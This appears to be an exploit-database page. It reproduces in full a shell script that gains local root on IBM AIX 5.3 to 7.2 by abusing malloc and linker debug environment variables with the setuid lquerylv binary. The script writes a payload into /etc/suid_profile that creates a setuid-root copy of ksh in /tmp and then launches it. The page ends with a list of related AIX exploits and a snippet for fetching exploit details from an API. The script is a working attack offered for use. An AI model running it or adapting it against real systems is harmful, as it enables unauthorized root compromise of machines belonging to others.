Search for hundreds of thousands of exploits

"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation"

Author

Exploit author

"Hector X. Monsegur"

Platform

Exploit platform

aix

Release date

Exploit published date

2016-11-04

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#!/usr/bin/sh
#
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
#
# This exploit takes advantage of known issues with debugging functions
# within the AIX linker library. We are taking advantage of known 
# functionality, and focusing on badly coded SUID binaries which do not
# adhere to proper security checks prior to seteuid/open/writes.
#
# The CVEs we will be taking advantage of:
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows 
#   local users to create or overwrite arbitrary files via a symlink attack on
#   the log file associated with the MALLOCDEBUG environment variable. 
#
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does 
#   not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE 
#   environment variables, which allows local users to gain privileges by 
#   leveraging a setuid-root program to create an arbitrary root-owned file 
#   with world-writable permissions, related to libC.a (aka the XL C++ runtime
#   library) in AIX 5.3 and libc.a in AIX 6.1. 
#
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary 
#   File Writes In IBM AIX.
#
# In each instance of the aforementioned CVEs, IBM merely patched the binaries 
# which were reported in the original reports as being used for escalation of
# the vulnerabilities. This allowed for the lquerylv binary to slip by their
# patches and become an attack vector. 
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]

ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
APP=$0

function usage
{
    echo "Usage: $APP [1] | [2] | [3]"
    echo
    echo "1 - MALLOCDEBUG file write -> escalation"
    echo "2 - _LIB_INIT_DBG_FILE file write -> escalation"
    echo "3 - MALLOCBUCKETS file write -> escalation"
    echo
    echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL"
    exit
}

function CVE20091786
{
    echo "[*] Exporting MALLOCDEBUG environment variable"
    MALLOCTYPE=debug
    MALLOCDEBUG=report_allocations,output:/etc/suid_profile
    export MALLOCTYPE MALLOCDEBUG
}

function CVE20092669
{
    echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable"
    _LIB_INIT_DBG=1
    _LIB_INIT_DBG_FILE=/etc/suid_profile
    export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
}

function CVE20143074
{
    echo "[*] Exporting MALLOCBUCKETS environment variable"
    MALLOCOPTIONS=buckets
    MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
    export MALLOCOPTIONS MALLOCBUCKETS
}

if [ -z "$1" ]; then
    usage
    exit 1
fi

while [ "$1" != "" ]; do
    case $1 in
        1 )    CVE20091786;;
        2 )    CVE20092669;;
        3 )    CVE20143074;;
        * )    usage
               break;;
    esac
    shift
done

if [ ! -x "/usr/sbin/lquerylv" ]; then
    echo "[-] lquerylv isn't executable. Tough luck."
    exit 1
fi

echo "[*] Setting umask to 000"
umask 000

echo "[*] Execute our vulnerable binary"
/usr/sbin/lquerylv >/dev/null 2>&1

if [ ! -e "/etc/suid_profile" ]; then
    echo "[-] /etc/suid_profile does not exist and exploit failed."
    exit 1
fi

echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile

echo "[*] Current id: `/usr/bin/id`"

echo "[*] Adding payload"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF

echo "[*] Unsetting env"
unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE

echo "[*] Executing ibstat for fun and profit"
/usr/bin/ibstat -a >/dev/null 2>&1

if [ ! -e "$ROOTSHELL" ]; then
    echo "[-] Rootshell does not exist and exploit failed."
    exit 1
fi

echo "[*] Executing rootshell"
$ROOTSHELL
Release DateTitleTypePlatformAuthor
2016-12-22"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation"localaix"Hector X. Monsegur"
2016-11-04"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation"localaix"Hector X. Monsegur"
2016-11-04"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation"localaix"Hector X. Monsegur"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/40710/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.